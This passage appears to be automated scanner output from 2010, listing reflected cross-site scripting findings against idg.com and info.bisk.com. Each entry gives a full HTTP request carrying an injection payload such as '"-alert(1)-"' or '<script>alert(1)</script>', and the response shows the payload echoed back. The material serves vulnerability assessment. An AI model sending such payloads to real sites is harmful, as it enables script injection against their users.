The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e35de"%3b134e9857aa3 was submitted in the REST URL parameter 3. This input was echoed as e35de";134e9857aa3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/typeforme35de"%3b134e9857aa3 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/typeforme35de";134e9857aa3");
} catch(err) {}</script>
...[SNIP]...

2.246. http://idg.com/www/idgproducts.nsf/typeform [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/typeform

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1831"-alert(1)-"b301e0f9a7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/typeform?a1831"-alert(1)-"b301e0f9a7f=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/typeform?a1831"-alert(1)-"b301e0f9a7f=1");
} catch(err) {}</script>
...[SNIP]...

2.247. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f478e"%3b38f4571d878 was submitted in the REST URL parameter 1. This input was echoed as f478e";38f4571d878 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwf478e"%3b38f4571d878/media.nsf/MRBydate HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5010
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwf478e";38f4571d878/media.nsf/MRBydate");
} catch(err) {}</script>
...[SNIP]...

2.248. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98f73"%3b4cbc64418be was submitted in the REST URL parameter 3. This input was echoed as 98f73";4cbc64418be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/media.nsf/MRBydate98f73"%3b4cbc64418be HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5010
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate98f73";4cbc64418be");
} catch(err) {}</script>
...[SNIP]...

2.249. http://idg.com/www/media.nsf/MRBydate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdc88"-alert(1)-"d900323b254 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/media.nsf/MRBydate?fdc88"-alert(1)-"d900323b254=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5023
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate?fdc88"-alert(1)-"d900323b254=1");
} catch(err) {}</script>
...[SNIP]...

2.250. http://idg.com/www/media.nsf/MRBydate [readform parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/media.nsf/MRBydate

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7113"-alert(1)-"051b7f0b7c4 was submitted in the readform parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/media.nsf/MRBydate?readforma7113"-alert(1)-"051b7f0b7c4 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:16 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5029
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/media.nsf/MRBydate?readforma7113"-alert(1)-"051b7f0b7c4");
} catch(err) {}</script>
...[SNIP]...

2.251. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860ea"%3b94e098012aa was submitted in the REST URL parameter 1. This input was echoed as 860ea";94e098012aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www860ea"%3b94e098012aa/pr.nsf/PressHome HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5008
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www860ea";94e098012aa/pr.nsf/PressHome");
} catch(err) {}</script>
...[SNIP]...

2.252. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec156"%3b6164df56710 was submitted in the REST URL parameter 3. This input was echoed as ec156";6164df56710 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/PressHomeec156"%3b6164df56710 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:06 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5008
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHomeec156";6164df56710");
} catch(err) {}</script>
...[SNIP]...

2.253. http://idg.com/www/pr.nsf/PressHome [ReadForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The value of the ReadForm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a6b2"-alert(1)-"28eeed432fc was submitted in the ReadForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5027
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHome?ReadForm3a6b2"-alert(1)-"28eeed432fc");
} catch(err) {}</script>
...[SNIP]...

2.254. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be16"><script>alert(1)</script>657b62b0feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/pr.nsf/PressHome?ReadForm&9be16"><script>alert(1)</script>657b62b0feb=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:20 GMT
Connection: close
Last-Modified: Thu, 16 Dec 2010 13:01:18 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12853
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Press Room
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="ReadForm&9be16"><script>alert(1)</script>657b62b0feb=1">
...[SNIP]...

2.255. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/PressHome

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3278"-alert(1)-"47e0292b7d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/PressHome?d3278"-alert(1)-"47e0292b7d6=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/PressHome?d3278"-alert(1)-"47e0292b7d6=1");
} catch(err) {}</script>
...[SNIP]...

2.256. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77e8"%3be788188be52 was submitted in the REST URL parameter 1. This input was echoed as d77e8";e788188be52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwd77e8"%3be788188be52/pr.nsf/prBydate?readform HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:17 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwd77e8";e788188be52/pr.nsf/prBydate?readform");
} catch(err) {}</script>
...[SNIP]...

2.257. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eef1a"%3bf411ccd2d7e was submitted in the REST URL parameter 3. This input was echoed as eef1a";f411ccd2d7e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/prBydateeef1a"%3bf411ccd2d7e?readform HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:17 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydateeef1a";f411ccd2d7e?readform");
} catch(err) {}</script>
...[SNIP]...

2.258. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ef1"><script>alert(1)</script>7048834a351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/pr.nsf/prBydate?readform&85ef1"><script>alert(1)</script>7048834a351=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:16 GMT
Connection: close
Last-Modified: Thu, 16 Dec 2010 13:01:14 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23894
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Press Room
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readform&85ef1"><script>alert(1)</script>7048834a351=1">
...[SNIP]...

2.259. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32037"-alert(1)-"27f782e283e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/prBydate?32037"-alert(1)-"27f782e283e=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydate?32037"-alert(1)-"27f782e283e=1");
} catch(err) {}</script>
...[SNIP]...

2.260. http://idg.com/www/pr.nsf/prBydate [readform parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/pr.nsf/prBydate

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50749"-alert(1)-"135b6c5479a was submitted in the readform parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/pr.nsf/prBydate?readform50749"-alert(1)-"135b6c5479a HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/prBydate?readform50749"-alert(1)-"135b6c5479a");
} catch(err) {}</script>
...[SNIP]...

2.261. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.bisk.com
Path:   /MCIndex.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00fc"-alert(1)-"b0f823cffe6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

